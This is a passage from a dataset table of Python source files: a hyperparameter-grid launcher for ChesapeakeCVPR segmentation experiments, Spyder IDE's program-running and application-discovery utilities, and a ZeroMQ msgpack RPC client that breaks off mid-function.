source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
run_chesapeake_cvpr_experiments.py
|
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Runs the train script with a grid of hyperparameters."""
import itertools
import os
import subprocess
from multiprocessing import Process, Queue
# list of GPU IDs that we want to use, one job will be started for every ID in the list
GPUS = [0]
DRY_RUN = False # if False then print out the commands to be run, if True then run
DATA_DIR = "" # path to the ChesapeakeCVPR data directory
# Hyperparameter options
training_set_options = ["de"]
model_options = ["unet"]
encoder_options = ["resnet18", "resnet50"]
lr_options = [1e-2, 1e-3, 1e-4]
loss_options = ["ce", "jaccard"]
weight_init_options = ["null", "imagenet"]
def do_work(work: "Queue[str]", gpu_idx: int) -> bool:
"""Process for each ID in GPUS."""
while not work.empty():
experiment = work.get()
experiment = experiment.replace("GPU", str(gpu_idx))
print(experiment)
if not DRY_RUN:
subprocess.call(experiment.split(" "))
return True
if __name__ == "__main__":
work: "Queue[str]" = Queue()
for (train_state, model, encoder, lr, loss, weight_init) in itertools.product(
training_set_options,
model_options,
encoder_options,
lr_options,
loss_options,
weight_init_options,
):
experiment_name = f"{train_state}_{model}_{encoder}_{lr}_{loss}_{weight_init}"
output_dir = os.path.join("output", "chesapeake-cvpr_experiments")
log_dir = os.path.join(output_dir, "logs")
config_file = os.path.join("conf", "chesapeake_cvpr.yaml")
if not os.path.exists(os.path.join(output_dir, experiment_name)):
command = (
"python train.py"
+ f" config_file={config_file}"
+ f" experiment.name={experiment_name}"
+ f" experiment.module.segmentation_model={model}"
+ f" experiment.module.encoder_name={encoder}"
+ f" experiment.module.encoder_weights={weight_init}"
+ f" experiment.module.learning_rate={lr}"
+ f" experiment.module.loss={loss}"
+ " experiment.module.class_set=7"
+ f" experiment.datamodule.train_splits=['{train_state}-train']"
+ f" experiment.datamodule.val_splits=['{train_state}-val']"
+ f" experiment.datamodule.test_splits=['{train_state}-test']"
+ f" program.output_dir={output_dir}"
+ f" program.log_dir={log_dir}"
+ f" program.data_dir={DATA_DIR}"
+ " trainer.gpus=[GPU]"
)
command = command.strip()
work.put(command)
processes = []
for gpu_idx in GPUS:
p = Process(target=do_work, args=(work, gpu_idx))
processes.append(p)
p.start()
for p in processes:
p.join()
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
from pkg_resources import parse_version
import psutil
# Local imports
from spyder.config.base import (running_under_pytest, get_home_dir,
running_in_mac_app)
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return temporary Spyder directory, checking previously that it exists.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_Profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# fumction fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = info_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils.icon_manager import ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it is supporting
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or wdir has spaces, must be enclosed in quotes (all platforms)
if ' ' in fname:
fname = '"' + fname + '"'
if ' ' in wdir:
wdir = '"' + wdir + '"'
# If python_exe contains spaces, it can't be ran on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
if running_in_mac_app(executable):
f.write(f'export PYTHONHOME={os.environ["PYTHONPATH"]}\n')
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name, env={})
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
try:
if cmp_op == '>':
return parse_version(actver) > parse_version(version)
elif cmp_op == '>=':
return parse_version(actver) >= parse_version(version)
elif cmp_op == '=':
return parse_version(actver) == parse_version(version)
elif cmp_op == '<':
return parse_version(actver) < parse_version(version)
elif cmp_op == '<=':
return parse_version(actver) <= parse_version(version)
else:
return False
except TypeError:
return True
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None,
distribution_name=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, > or < to specify the exact requirement ;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
``distribution_name`` is the distribution name of a package. For instance,
for pylsp_black that name is python_lsp_black.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
# instance, if it's __pycache__ main directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
# Try to get the module version from its distribution name. For
# instance, pylsp_black doesn't have a version but that can be
# obtained from its distribution, called python_lsp_black.
if not module_version and distribution_name:
module_version = get_package_version(distribution_name)
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
# Must be imported here to avoid circular import
from spyder.utils.conda import is_conda_env
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(real_filename)):
return False
# File exists and has valid name
is_text_file = encoding.is_text_file(real_filename)
if is_pythonw(real_filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not is_text_file:
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_conda_env(pyexec=real_filename) and is_text_file:
return True
elif not is_text_file:
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif is_text_file:
# At this point we can't have a text file
return False
else:
return check_python_help(real_filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
client.py
|
import importlib
import logging
import threading
import time
import uuid
import msgpack
import zmq
from .exceptions import Timeout, UnknownFormat, RemoteException, UnknownMessageType
LOGGER = logging.getLogger("zmqdrpc-client")
LOGGER.setLevel("WARNING")
_ = logging.StreamHandler()
_.setLevel('WARNING')
_.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
LOGGER.addHandler(_)
def gevent_patch():
global zmq
zmq = importlib.import_module('zmq.green')
class Replay():
def __init__(self, uid, timeout_at):
self.event = threading.Event()
self.timeout_at = timeout_at
self.uid = uid
def get(self):
now = time.time()
if self.poll():
return self.value
if self.timeout_at <= now:
raise Timeout("timeout")
if self.event.wait(self.timeout_at - now):
if self.is_exception:
raise self.value
return self.value
else:
raise Timeout("timeout")
def __set(self, value, is_exception=False):
self.is_exception = is_exception
self.value = value
self.event.set()
def poll(self):
return self.event.isSet()
class Call():
def __init__(self, name, client):
self.client = client
self.name = name
def __call__(self, *args, **kwargs):
if "_timeout" in kwargs:
timeout = kwargs['_timeout']
kwargs.pop('_timeout')
else:
timeout = self.client._timeout
return self.client._on_call(self.name, timeout, args, kwargs)
class Client(object):
def __init__(self, address, timeout=60, threaded=True):
self.__context = zmq.Context(1)
self._timeout = timeout
self.__address = tuple(address)
self.__threaded = threaded
if threaded:
self.__tlocal = threading.local()
else:
class _(object):
pass
self.__tlocal = _()
@property
def __socket(self):
if hasattr(self.__tlocal, "socket"):
return self.__tlocal.socket
else:
self.__tlocal.socket = self.__context.socket(zmq.REQ)
self.__tlocal.socket.connect("tcp://%s:%s"%self.__address)
if not hasattr(self.__tlocal, "poller"):
self.__tlocal.poller = zmq.Poller()
self.__tlocal.poller.register(self.__tlocal.socket, zmq.POLLIN)
return self.__tlocal.socket
@__socket.setter
def __socket(self, value):
self.__tlocal.socket = value
@property
def __poller(self):
if hasattr(self.__tlocal, "poller"):
return self.__tlocal.poller
else:
self.__tlocal.poller = zmq.Poller()
def __on_timeout(self):
self.__poller.unregister(self.__socket)
self.__socket.setsockopt(zmq.LINGER, 0)
self.__socket.close()
self.__socket = self.__context.socket(zmq.REQ)
self.__socket.connect("tcp://%s:%s"%self.__address)
self.__poller.register(self.__socket, zmq.POLLIN)
def _on_call(self, name, timeout, args, kwargs):
msg = msgpack.packb(["request", '', name, args, kwargs], encoding="utf-8")
self.__socket.send_multipart([msg])
socks = self.__poller.poll(timeout*1000)
if socks:
frames = self.__socket.recv_multipart()
if len(frames) == 1:
msg = msgpack.unpackb(frames[0], encoding="utf-8")
else:
raise UnknownFormat("unknow format")
